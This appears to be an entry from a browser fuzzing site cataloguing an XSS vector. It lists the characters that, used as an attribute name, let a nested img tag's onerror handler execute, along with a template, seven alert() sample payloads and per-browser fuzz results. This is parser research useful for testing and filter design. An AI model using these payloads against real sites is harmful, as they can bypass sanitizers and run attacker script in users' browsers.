Characters ignored in an attribute name
7
7
7This vector shows which characters when used as an attribute name are ignored by the HTML parser and allow the image to execute.
Created by: hackvertor
Created on: Tuesday, May 28, 2024 at 7:38:17 PM
Updated on: Sunday, April 20, 2025 at 8:15:59 PM
Vector type: XSS
Vector charset: UTF-8
Template used:
<div $[chr]="><img src=x:x onerror=log($[i])>"></div>
Your browser was detected as:
Detecting... Detecting... Detecting... Detecting...
Sample payloads
<div ="><img src=x:x onerror=alert(9)>"></div>
<div
="><img src=x:x onerror=alert(10)>"></div>
<div
="><img src=x:x onerror=alert(12)>"></div>
<div
="><img src=x:x onerror=alert(13)>"></div>
<div ="><img src=x:x onerror=alert(32)>"></div>
<div /="><img src=x:x onerror=alert(47)>"></div>
<div >="><img src=x:x onerror=alert(62)>"></div>
Fuzz results
Chrome 125.0.0.0 Unknown Unknown
Updated
Tue May 28 2024
Found 7 results
Loading...
Safari 17.4 Unknown Unknown
Updated
Tue May 28 2024
Found 7 results
Loading...
Firefox 126.0 Unknown Unknown
Updated
Tue May 28 2024
Found 7 results
Loading...
Safari 17.5 mobile iOS 17.5.1
Updated
Fri Jun 07 2024
Found 7 results
Loading...